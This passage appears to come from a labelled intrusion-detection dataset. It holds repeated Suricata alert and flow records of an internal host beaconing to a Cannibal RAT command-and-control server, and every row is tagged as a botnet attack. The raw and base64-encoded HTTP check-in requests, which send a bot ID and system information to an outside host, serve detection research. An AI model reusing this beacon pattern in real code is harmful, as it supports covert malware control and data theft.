event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3931390, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:35
83,397
Friday
[{'timestamp': '2017-07-07T13:05:35.207964+0000', 'flow_id': 1227757323282722, 'pcap_cnt': 3931390, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1857, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:35.125218+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocmpAAIAGSrzAqAoJza6lSQdBH5D9QOBODX+HYFARAQDX6QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:35.207964+0000', 'flow_id': 1227757323282722, 'pcap_cnt': 3931390, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1857, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:35.125218+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocmpAAIAGSrzAqAoJza6lSQdBH5D9QOBODX+HYFARAQDX6QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,305
192.168.10.9-1858-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3933719, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:45
81,766
Friday
[{'timestamp': '2017-07-07T13:05:45.299286+0000', 'flow_id': 1194587291473086, 'pcap_cnt': 3933719, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1858, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:45.218302+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocuJAAIAGSkTAqAoJza6lSQdCH5Ds6kMPRV9Lc1ARAQCJiwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:45.299286+0000', 'flow_id': 1194587291473086, 'pcap_cnt': 3933719, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1858, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:45.218302+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocuJAAIAGSkTAqAoJza6lSQdCH5Ds6kMPRV9Lc1ARAQCJiwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,457
192.168.10.9-1859-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3935964, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:05:55
79,937
Friday
[{'timestamp': '2017-07-07T13:05:55.390802+0000', 'flow_id': 1671010834432181, 'pcap_cnt': 3935964, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1859, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:55.311477+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocv1AAIAGSinAqAoJza6lSQdDH5DIqmOE2pL+q1ARAQBE6QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:05:55.390802+0000', 'flow_id': 1671010834432181, 'pcap_cnt': 3935964, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1859, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:05:55.311477+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocv1AAIAGSinAqAoJza6lSQdDH5DIqmOE2pL+q1ARAQBE6QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,516
192.168.10.9-1860-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3938210, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:06:05
74,150
Friday
[{'timestamp': '2017-07-07T13:06:05.491104+0000', 'flow_id': 1789285644459980, 'pcap_cnt': 3938210, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1860, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:05.417740+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocxVAAIAGShHAqAoJza6lSQdEH5CgMYv1yEKnbFARAQCufwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:06:05.491104+0000', 'flow_id': 1789285644459980, 'pcap_cnt': 3938210, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1860, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:05.417740+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocxVAAIAGShHAqAoJza6lSQdEH5CgMYv1yEKnbFARAQCufwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,605
192.168.10.9-1861-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3955623, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:06:15
93,723
Friday
[{'timestamp': '2017-07-07T13:06:15.590815+0000', 'flow_id': 1789186860881969, 'pcap_cnt': 3955623, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1861, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:15.497713+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocypAAIAGSfzAqAoJza6lSQdFH5DqGiO0N8OHmlARAQB9KAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:06:15.590815+0000', 'flow_id': 1789186860881969, 'pcap_cnt': 3955623, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1861, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:06:15.497713+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAocypAAIAGSfzAqAoJza6lSQdFH5DqGiO0N8OHmlARAQB9KAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,234,654
192.168.10.9-1991-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3964579, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:06:25
74,846
Friday
